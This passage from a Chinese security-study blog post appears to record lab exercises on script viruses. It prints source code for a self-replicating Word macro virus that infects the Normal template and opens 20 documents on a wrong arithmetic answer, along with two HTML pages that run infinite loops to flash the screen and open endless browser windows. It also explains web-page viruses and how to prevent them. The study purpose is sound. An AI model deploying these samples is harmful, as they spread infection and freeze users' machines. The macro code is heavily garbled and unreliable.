class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line">#当打开被感染的word文档时，首先进行自我复制，感染word模板，然后检查日期，看是否是1日（即在每月的1日会发作），然后跳出一个对话框，要求用户进行一次心算游戏，这里只用四个小于10的数相乘，如果作者的计算正确，那么就会新建一个文档，跳出如下字幕：</span><br><span class="line">　　何谓宏病毒 答案：我就是......</span><br><span class="line">　　如何预防宏病毒 答案：不要看我......</span><br><span class="line">　　如果计算错误，新建20个写有“宏病毒”字样的word文档，关闭文档的时候也会执行同样的询问。</span><br><span class="line">&#x27; moonli ght</span><br><span class="line">Dim nm (4)</span><br><span class="line">Sub Document. Open 0</span><br><span class="line">’Di sableInput 1</span><br><span class="line">Set ourcodemodule = Thi sDocument. VBPr oject. VBComponents (1). CoelMlodule</span><br><span class="line">Set host = NormalTemplate. VBProject. VBComponents (1). CodeModule</span><br><span class="line">If Thi sDocunent = NormalTemplate Then</span><br><span class="line">	Set host = ActiveDocument. VBProject. VBComponents (1 ). CodeModule</span><br><span class="line">End If</span><br><span class="line">With host</span><br><span class="line">If . Lines(1， 1) &lt;“&#x27; moonli ght&quot; Then</span><br><span class="line">	DeleteLines 1，. CountOfLines</span><br><span class="line">InsertLines 1，our codemodule. Lines (1，100)</span><br><span class="line">. ReplaceLine 3， “Sub Document. _Close 0&quot;</span><br><span class="line">	If Thi sDocunent = NormalT emplate Then</span><br><span class="line">		ReplaceLine 3，“Sub Document_ 0pen 0&quot;</span><br><span class="line">		ActiveDocunent. SaveAs Acti veDocument. Fu1lName</span><br><span class="line">	End If</span><br><span class="line">End If</span><br><span class="line">End With</span><br><span class="line"></span><br><span class="line">Count = 0</span><br><span class="line">If Day(Now0) = 1 Then</span><br><span class="line">try:</span><br><span class="line">		0n Error GoTo try</span><br><span class="line">        test = -1</span><br><span class="line">        tog$ =““</span><br><span class="line">        While test = -1</span><br><span class="line">			For i=0 To 4</span><br><span class="line">                 m(i) = Int (kndO * 10)</span><br><span class="line">                 con = con * nm(i)</span><br><span class="line">                 If i=4Then</span><br><span class="line">					tog$ = tog$ + Str$ (nm(4)) +“=?&quot;</span><br><span class="line">					GoTo beg</span><br><span class="line">				End If</span><br><span class="line">       		     tog$ = to$ + Str$ (m(i)) +“*&quot;</span><br><span class="line">       	     Next i</span><br><span class="line">beg:</span><br><span class="line">        Beep</span><br><span class="line">        ans$ =. InputBox$(&quot;今天是“ + Date$_ + &quot;, 跟你玩一个心算游戏“ + Chr$(13) +“若你答错，只好接受震撼教育..... + Chr$(13) + tos$.</span><br><span class="line">        If RTrim$ CLTrim$ (ans$)) = LTrim$ (Str$ (con)) Then</span><br><span class="line">            &quot;Docunents. Add</span><br><span class="line">            Selecti on. Paragraphs. Ali eument = wdAli ePar aer sphCenter</span><br><span class="line">            Beep</span><br><span class="line">            Wi th Selecti on. Font</span><br><span class="line">            	. Name =&quot;细明体&quot;</span><br><span class="line">                . Size = 16</span><br><span class="line">                . Bold =</span><br><span class="line">                . Underline = 1</span><br><span class="line">            End With</span><br><span class="line">            Selecti on. InsertAfter Text:=“何谓宏病毒“</span><br><span class="line">            Selecti on. Inser tP ar agr aphAfter</span><br><span class="line">            Beep</span><br><span class="line">            Selecti on. InsertAfter Text:=&quot;答案: “</span><br><span class="line">            Selection. Font.Italic = 1</span><br><span class="line">            Selecti on. InsertAfter Text:=&quot;我就......</span><br><span class="line">            Selecti on. Inser tP ar agr aphAfter</span><br><span class="line">            Selecti on. Inser tP ar agr sphAfter</span><br><span class="line">            Selection. Font.Italic = 0</span><br><span class="line">            Beep</span><br><span class="line">            Selection. Inser tAfter Text:=“如何预防宏病毒“</span><br><span class="line">            Selecti on. Inser tP ar agr aphAfter</span><br><span class="line">            Selecti on. InsertAfter Text:=&quot;答案:</span><br><span class="line">            Selection. Font.Italic = 1</span><br><span class="line">            Selecti on. InsertAfter Text:=“不要看我.....</span><br><span class="line">            GoTo ou</span><br><span class="line">            Else</span><br><span class="line">                Count = Count + 1</span><br><span class="line">                For j=1 To 20</span><br><span class="line">                    Beep</span><br><span class="line">                    Docunents. Add</span><br><span class="line">                Next j</span><br><span class="line">                Selecti on. Par agraphs. Ali emment = wdAli gnP ar agr aphCenter</span><br><span class="line">                Selecti on. InsertAfter Text:=“宏病毒 “</span><br><span class="line">                If Count = 2 Then GoTo out</span><br><span class="line">                Go To try</span><br><span class="line">			EndIf</span><br><span class="line">Wend</span><br><span class="line">End If</span><br><span class="line">out:</span><br><span class="line">End Sub</span><br></pre></td></tr></table></figure></li>
<li><p>点开写了宏病毒的文件，会发现文件被感染。</p>
</li>
</ol>
<hr>
<h2 id="HTML恶意代码"><a href="#HTML恶意代码" class="headerlink" title="HTML恶意代码"></a>HTML恶意代码</h2><p><strong>1.网页病毒定义</strong><br>　　网页病毒是利用网页来进行破坏的病毒，它使用一些SCRIPT语言编写的一些恶意代码利用浏览器的漏洞来实现病毒植入。当用户登录某些含有网页病毒的网站时，网页病毒便被悄悄激活，这些病毒一旦激活，可以利用系统的一些资源进行破坏。轻则修改用户的注册表，使用户的首页、浏览器标题改变，重则可以关闭系统的很多功能，装上木马，染上病毒，使用户无法正常使用计算机系统，严重者则可以将用户的系统进行格式化。而这种网页病毒容易编写和修改，使用户防不胜防。</p>
<p><strong>2.网页病毒概述</strong><br>　　网页病毒都是利用JS.ActiveX、WSH共同合作来实现对客户端计算机，进行本地的写操作，如改写注册表，在本地计算机硬盘上添加、删除、更改文件夹或文件等操作。而这一功能却恰恰使网页病毒、网页木马有了可乘之机。</p>
<p><strong>3.网页病毒攻击方式</strong><br>　　既然是网页病毒，那么很简单的说，它就是一个网页，但在这个网页运行与本地时，它所执行的操作就不仅仅是下载后再读出，伴随着前者的操作背后，还有这病毒原体软件的下载，或是木马的下载，然后执行，悄悄地修改你的注册表，等等…那么，这类网页都有什么特征呢？<br>　　a）美丽的网页名称，以及利用浏览者的无知<br>　　b）利用浏览者的好奇心<br>　　c）无意识的浏览者<br>　　它主要是利用软件或系统操作平台等的安全漏洞，通过执行嵌入在网页HTML超文本标记语言内的Java Applet小应用程序，javascript脚本语言程序，ActiveX软件部件网络交互技术支持可自动执行的代码程序，以强行修改用户操作系统的注册表设置及系统实用配置程序，或非法控制系统资源盗取用户文件，或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。</p>
<p><strong>4.网页病毒种类</strong><br>　　根据目前互联网上流行的常见网页病毒的作用对象及表现特征，归纳为以下两大种类：<br>　　a）、通过Java Script、Applet、ActiveX编辑的脚本程序修改IE浏览器：<br>　　①.默认主页被修改；<br>　　②.默认首页被修改；<br>　　③.默认的微软主页被修改；<br>　　④.主页设置被屏蔽锁定，且设置选项无效不可改回；<br>　　⑤.默认的IE搜索引擎被修改；<br>　　⑥ IE标题栏被添加非法信息<br>　　⑦.OE标题栏被添加非法信息；<br>　　⑧.鼠标右键菜单被添加非法网站广告链接；<br>　　⑨.鼠标右键弹出菜单功能被禁用失常；<br>　　⑩ IE收藏夹被强行添加非法网站的地址链接；<br>　　b）、通过Java Script、Applet、ActiveX编辑的脚本程序修改用户操作系统：<br>　　①.开机出现对话框；<br>　　②.系统正常启动后，但IE被锁定网址自动调用打开；<br>　　③.格式化硬盘<br>　　④.暗藏“万花谷”蛤蟆病毒，全方位侵害封杀系统，最后导致瘫痪崩溃；<br>　　⑤.非法读取或盗取用户文件；<br>　　⑥.锁定禁用注册表；<br>　　⑦.注册表被锁定禁用之后，编辑*.reg注册表文件打开方式错乱；<br>　　⑧.时间前面加广告；<br>　　⑨.启动后首页被再次修改；<br>　　⑩.更改“我的电脑”下的一系列文件夹名称</p>
<p><strong>5.网页病毒防范</strong><br>　　a）.提高自身意识，不随便浏览别人给的奇怪网址<br>　　b).安装杀毒软件，安全助手等<br>　　c).尽量少用插件较多的浏览器，并经常升级浏览器版本<br>　　d).及时安装系统补丁</p>
<p><strong>实验内容</strong></p>
<p>浏览器打开写有恶意代码的文件.html</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">#使网页不停黑白闪烁</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;script&gt;</span><br><span class="line">var color = new Array</span><br><span class="line">color[0]=&quot;black&quot;</span><br><span class="line">color[1]=&quot;white&quot;</span><br><span class="line">x = 0;</span><br><span class="line">while(true)&#123;</span><br><span class="line">    document.bgColor=color[x++];</span><br><span class="line">    document.bgColor=color[x--];</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#不停的打开http://www.163.com的网页</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body onload = &quot;WindowBomb()&quot;&gt;</span><br><span class="line">&lt;SCRIPT LANGUAGE = &quot;javascript&quot;&gt;</span><br><span class="line">function WindowBomb()</span><br><span class="line">&#123;</span><br><span class="line">while (true)&#123;</span><br><span class="line">window.open(&quot;http://www.163.com&quot;)</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>可以在任务管理器中结束进程。</p>
<hr>
<h2 id="js网页注入"><a href="#js网页注入" class="headerlink" title="js网页注入"></a>js网页注入</h2><ul>
<li>1.js的原理</li>
</ul>
<p>（1）JavaScript简介 JavaScript的原名叫LiveScript，是NetScape公司在引入Sun公司有关Java的程序设计概念后，重新设计而更名的。JavaScript是一种可以嵌入HTML文档的，基于对象并具有某些面向对象特征的脚本语言。 说明：浏览器端脚本语言除了JavaScript，还有VBScript和Jscript，后两个是Microsoft公司设计的，欲了解相关内容，可到Microsoft公司网站查询。本课程仅介绍JavaScript。<br>（2）JavaScript的特点 JavaScript是一种基于对象(Object-Based)和事件驱动(Event Driven)，由浏览器解释执行的，具有安全性能的客户端脚本语言。使用它的目的是与HTML、Java Applet（Java小程序）一起实现在一个Web页面中链接多个对象，与Web客户交互作用，从而可以开发客户端的应用程序等。它是通过嵌入在HTML语言中实现的。它的出现弥补了HTML语言的缺陷，它是Java与HTML折衷的选择，具有以下几个基本特点： 是一种脚本语言 采用小程序段的方式实现编程，以嵌入的方式，与HTML标识结合在一起，方便用户的使用操作。基于对象的语言。 这里的对象，是指客户机、浏览器、网页文档。也就是说，JavaScript以类似C、Java的语法，以客户机、浏览器、网页文档、文档内部各种以标记表示的HTML元素为对象，以控制这些对象为目标，进而控制整个客户端的一种客户端脚本编程语言。 简单 首先它是一种基于Java基本语句和控制流之上的简单而紧凑的设计, 从而对于学习Java是一种非常好的过渡。其次它的变量类型是采用弱类型，并未使用严格的数据类型。  安全 它不允许访问服务器本地的硬盘，因此不能将数据存入到服务器上；不允许对网络文档进行修改和删除，只能通过浏览器实现信息浏览或动态交互。从而有效地防止数据的丢失。 动态 它可以直接对用户的输入做出响应，无须经过Web服务程序。它对用户的响应，是采用以事件驱动的方式进行的。事件(Event)可分为两类，一是用户对浏览器进行的某种操作，比如按下鼠标、移动窗口、选择菜单等，可以视为<strong>用户事件</strong>；二是<strong>系统事件</strong>，如时间的时刻变化等。当事件发生后，会向浏览器发送相应的消息（用户消息或系统消息），根据消息，浏览器可能会做出相应的响应，这种响应称为<strong>事件驱动</strong>，也叫消息驱动。 跨平台 JavaScript代码由浏览器解释执行，与操作环境无关，只要能运行浏览器的计算机，并支持JavaScript的浏览器就可正确执行，从而实现了“编写一次，走遍天下”的梦想。 实际上JavaScript最杰出之处在于可以用很小的程序做大量的事。无须有高性能的电脑，软件仅需一个字处理软件及一浏览器，无须WEB服务器。</p>
<p><strong>实验内容</strong></p>
<p>利用firefox浏览器中的firebug插件，对于”百度一下”用firebug查看元素。打开控制台，输入js代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">document.getElementById(&quot;su&quot;).click();</span><br><span class="line">或</span><br><span class="line">var s=document.getElementById(&#x27;load&#x27;); s.click()</span><br></pre></td></tr></table></figure>

<p>运行，js脚本触发了”百度一下“按钮，进行搜索动作。</p>

      
     
   </div>
    <footer class="article-footer">
      <a data-url="https://amy-ccc098.github.io/2021/12/02/%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E6%94%BB%E5%87%BB/%E8%84%9A%E6%9C%AC%E7%97%85%E6%AF%92%E6%94%BB%E5%87%BB/" data-id="cl0qtlfxw000niwvs9is99fsx" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/safety/" rel="tag">safety</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/12/13/%E7%97%85%E6%AF%92%E8%AF%86%E5%88%AB/%E7%97%85%E6%AF%92%E8%AF%86%E5%88%AB/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          病毒识别
        
      </div>
    </a>
  
  
    <a href="/2021/11/17/hexo%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/hexo%E6%90%AD%E5%BB%BA%E4%B8%AA%E4%BA%BA%E5%8D%9A%E5%AE%A2/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">hexo搭建个人博客</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/cisp/" rel="tag">cisp</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fun/" rel="tag">fun</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/fun-stuff/" rel="tag">fun stuff</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/safety/" rel="tag">safety</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/study/" rel="tag">study</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/tools/" rel="tag">tools</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签云</h3>
    <div class="widget tagcloud">
      <a href="/tags/cisp/" style="font-size: 10px;">cisp</a> <a href="/tags/fun/" style="font-size: 10px;">fun</a> <a href="/tags/fun-stuff/" style="font-size: 10px;">fun stuff</a> <a href="/tags/safety/" style="font-size: 20px;">safety</a> <a href="/tags/study/" style="font-size: 16.67px;">study</a> <a href="/tags/tools/" style="font-size: 13.33px;">tools</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">二月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">一月 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">十二月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">十一月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">十月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/05/">五月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/03/">三月 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">一月 2021</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/02/21/%E6%96%87%E4%BB%B6%E6%81%A2%E5%A4%8D%E6%96%B9%E6%B3%95/%E6%96%87%E4%BB%B6%E6%81%A2%E5%A4%8D%E6%96%B9%E6%B3%95/">文件恢复方法</a>
          </li>
        
          <li>
            <a href="/2022/02/20/owasp-top-10/owasp-top-10/">owasp top 10</a>
          </li>
        
          <li>
            <a href="/2022/02/14/%E3%80%8A%E5%85%B3%E4%BA%8E%E6%88%91%E5%B0%86%E7%BE%BD%E7%94%9F%E7%BB%93%E5%BC%A6%E6%AF%94%E8%B5%9B%E8%A7%86%E9%A2%91%E5%81%9A%E6%88%90%E8%AF%8D%E4%BA%91%E8%A7%86%E9%A2%91%E3%80%8B/%E3%80%8A%E5%85%B3%E4%BA%8E%E6%88%91%E5%B0%86%E7%BE%BD%E7%94%9F%E7%BB%93%E5%BC%A6%E6%AF%94%E8%B5%9B%E8%A7%86%E9%A2%91%E5%81%9A%E6%88%90%E8%AF%8D%E4%BA%91%E8%A7%86%E9%A2%91%E3%80%8B/">《关于我将羽生结弦比赛视频做成词云视频》</a>
          </li>
        
          <li>
            <a href="/2022/01/14/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E4%BF%9D%E9%9A%9C/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8%E4%BF%9D%E9%9A%9C/">信息安全保障</a>
          </li>
        
          <li>
            <a href="/2022/01/05/kali-linux%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E7%9B%91%E6%8E%A7%E3%80%90python%E3%80%91/kali-linux%E7%B3%BB%E7%BB%9F%E6%96%87%E4%BB%B6%E7%9B%91%E6%8E%A7%E3%80%90python%E3%80%91/">kali-linux系统文件监控【python】</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 CAIMI<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>